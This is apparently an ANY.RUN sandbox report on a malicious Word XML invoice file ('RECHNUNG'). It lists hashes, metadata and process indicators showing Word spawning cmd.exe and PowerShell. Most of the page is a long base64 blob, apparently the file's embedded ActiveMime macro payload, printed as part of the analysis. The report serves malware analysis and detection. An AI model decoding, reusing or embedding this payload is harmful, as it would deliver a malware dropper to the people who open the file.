analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

RECHNUNG

Full analysis: https://app.any.run/tasks/2d47bcd7-f3bc-4ca3-ac13-7b5e20828237
Verdict: Malicious activity
Analysis date: January 22, 2019, 11:44:32
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

8382F58B07748E1674762BC4377DC202

SHA1:

DF2B04B8A8F3D98D468387326D7A6A4ABA4AA0D5

SHA256:

C324B8597CA11A5FAD5FD5D292F01E9DD5C88FAA7094A366E089B92684268808

SSDEEP:

3072:vh5eJ/zUa+Dl0SiNKDzaJFUKc0UTE7yZRUV7RJeOzi8O:vhQJ/zUa++REDzYUTE7yZRVUi8O

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2356)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2356)
    • Runs app for hidden code execution

      • cmd.exe (PID: 3320)
    • Executes PowerShell scripts

      • cmd.exe (PID: 4004)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 3428)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3492)
      • cmd.exe (PID: 2900)
      • cmd.exe (PID: 3320)
    • Application launched itself

      • cmd.exe (PID: 2900)
      • cmd.exe (PID: 3492)
    • Creates files in the user directory

      • powershell.exe (PID: 2188)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2356)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2356)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:115.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 111550 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 00843CA7
WordDocumentBodySectPRsidRDefault: 001C0641
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 001C0641
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: 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 